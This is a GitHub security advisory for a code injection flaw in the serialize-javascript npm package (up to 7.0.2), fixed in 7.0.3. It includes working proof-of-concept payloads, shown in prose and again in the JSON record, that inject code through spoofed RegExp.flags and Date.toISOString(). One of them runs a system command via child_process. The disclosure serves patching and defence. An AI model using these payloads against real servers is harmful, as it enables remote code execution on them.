GHSA-5C6J-R48X-RMVQ
Vulnerability from github – Published: 2026-02-28 02:50 – Updated: 2026-02-28 02:50
VLAI?
Summary
Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()
Details
Impact
The serialize-javascript npm package (versions <= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.
While RegExp.source is sanitized, RegExp.flags is interpolated directly into the generated output without escaping. A similar issue exists in Date.prototype.toISOString().
If an attacker can control the input object passed to serialize(), they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via eval, new Function, or <script> tags), the injected code executes.
javascript
const serialize = require('serialize-javascript');
// Create an object that passes instanceof RegExp with a spoofed .flags
const fakeRegex = Object.create(RegExp.prototype);
Object.defineProperty(fakeRegex, 'source', { get: () => 'x' });
Object.defineProperty(fakeRegex, 'flags', {
get: () => '"+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"'
});
fakeRegex.toJSON = function() { return '@placeholder'; };
const output = serialize({ re: fakeRegex });
// Output: {"re":new RegExp("x", ""+(global.PWNED="CODE_INJECTION_VIA_FLAGS")+"")}
let obj;
eval('obj = ' + output);
console.log(global.PWNED); // "CODE_INJECTION_VIA_FLAGS" — injected code executed!
#h2. PoC 2: Code Injection via Date.toISOString()
javascript
const serialize = require('serialize-javascript');
const fakeDate = Object.create(Date.prototype);
fakeDate.toISOString = function() { return '"+(global.DATE_PWNED="DATE_INJECTION")+"'; };
fakeDate.toJSON = function() { return '2024-01-01'; };
const output = serialize({ d: fakeDate });
// Output: {"d":new Date(""+(global.DATE_PWNED="DATE_INJECTION")+"")}
eval('obj = ' + output);
console.log(global.DATE_PWNED); // "DATE_INJECTION" — injected code executed!
#h2. PoC 3: Remote Code Execution
javascript
const serialize = require('serialize-javascript');
const rceRegex = Object.create(RegExp.prototype);
Object.defineProperty(rceRegex, 'source', { get: () => 'x' });
Object.defineProperty(rceRegex, 'flags', {
get: () => '"+require("child_process").execSync("id").toString()+"'
});
rceRegex.toJSON = function() { return '@rce'; };
const output = serialize({ re: rceRegex });
// Output: {"re":new RegExp("x", ""+require("child_process").execSync("id").toString()+"")}
// When eval'd on a Node.js server, executes the "id" system command
Patches
The fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3
Severity ?
8.1 (High)
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 7.0.2"
},
"package": {
"ecosystem": "npm",
"name": "serialize-javascript"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "7.0.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-96"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-28T02:50:45Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Impact\n\nThe serialize-javascript npm package (versions \u003c= 7.0.2) contains a code injection vulnerability. It is an incomplete fix for CVE-2020-7660.\n\nWhile `RegExp.source` is sanitized, `RegExp.flags` is interpolated directly into the generated output without escaping. A similar issue exists in `Date.prototype.toISOString()`.\n\nIf an attacker can control the input object passed to `serialize()`, they can inject malicious JavaScript via the flags property of a RegExp object. When the serialized string is later evaluated (via `eval`, `new Function`, or `\u003cscript\u003e` tags), the injected code executes.\n\n```\njavascript\nconst serialize = require(\u0027serialize-javascript\u0027);\n// Create an object that passes instanceof RegExp with a spoofed .flags\nconst fakeRegex = Object.create(RegExp.prototype);\nObject.defineProperty(fakeRegex, \u0027source\u0027, { get: () =\u003e \u0027x\u0027 });\nObject.defineProperty(fakeRegex, \u0027flags\u0027, {\n get: () =\u003e \u0027\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\u0027\n});\nfakeRegex.toJSON = function() { return \u0027@placeholder\u0027; };\nconst output = serialize({ re: fakeRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+(global.PWNED=\"CODE_INJECTION_VIA_FLAGS\")+\"\")}\nlet obj;\neval(\u0027obj = \u0027 + output);\nconsole.log(global.PWNED); // \"CODE_INJECTION_VIA_FLAGS\" \u2014 injected code executed!\n#h2. PoC 2: Code Injection via Date.toISOString()\n```\n\n```\njavascript\nconst serialize = require(\u0027serialize-javascript\u0027);\nconst fakeDate = Object.create(Date.prototype);\nfakeDate.toISOString = function() { return \u0027\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\u0027; };\nfakeDate.toJSON = function() { return \u00272024-01-01\u0027; };\nconst output = serialize({ d: fakeDate });\n// Output: {\"d\":new Date(\"\"+(global.DATE_PWNED=\"DATE_INJECTION\")+\"\")}\neval(\u0027obj = \u0027 + output);\nconsole.log(global.DATE_PWNED); // \"DATE_INJECTION\" \u2014 injected code executed!\n#h2. PoC 3: Remote Code Execution\n```\n\n```\njavascript\nconst serialize = require(\u0027serialize-javascript\u0027);\nconst rceRegex = Object.create(RegExp.prototype);\nObject.defineProperty(rceRegex, \u0027source\u0027, { get: () =\u003e \u0027x\u0027 });\nObject.defineProperty(rceRegex, \u0027flags\u0027, {\n get: () =\u003e \u0027\"+require(\"child_process\").execSync(\"id\").toString()+\"\u0027\n});\nrceRegex.toJSON = function() { return \u0027@rce\u0027; };\nconst output = serialize({ re: rceRegex });\n// Output: {\"re\":new RegExp(\"x\", \"\"+require(\"child_process\").execSync(\"id\").toString()+\"\")}\n// When eval\u0027d on a Node.js server, executes the \"id\" system command\n```\n\n### Patches\n\nThe fix has been published in version 7.0.3. https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3",
"id": "GHSA-5c6j-r48x-rmvq",
"modified": "2026-02-28T02:50:45Z",
"published": "2026-02-28T02:50:45Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/security/advisories/GHSA-5c6j-r48x-rmvq"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7660"
},
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/commit/2e609d0a9f4f5b097f0945af88bd45b9c7fb48d9"
},
{
"type": "ADVISORY",
"url": "https://github.com/advisories/GHSA-hxcc-f52p-wc94"
},
{
"type": "PACKAGE",
"url": "https://github.com/yahoo/serialize-javascript"
},
{
"type": "WEB",
"url": "https://github.com/yahoo/serialize-javascript/releases/tag/v7.0.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Serialize JavaScript is Vulnerable to RCE via RegExp.flags and Date.prototype.toISOString()"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…